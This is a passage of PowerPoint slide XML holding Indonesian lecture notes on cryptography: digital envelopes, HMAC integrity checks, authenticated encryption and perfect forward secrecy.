              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transport juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keaslian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keaslian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Hash (HMAC). HMAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Terautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> (AE). Jenis mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keaslian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1"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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15970367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Kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sempurna</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>amplop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>amplop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital, server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
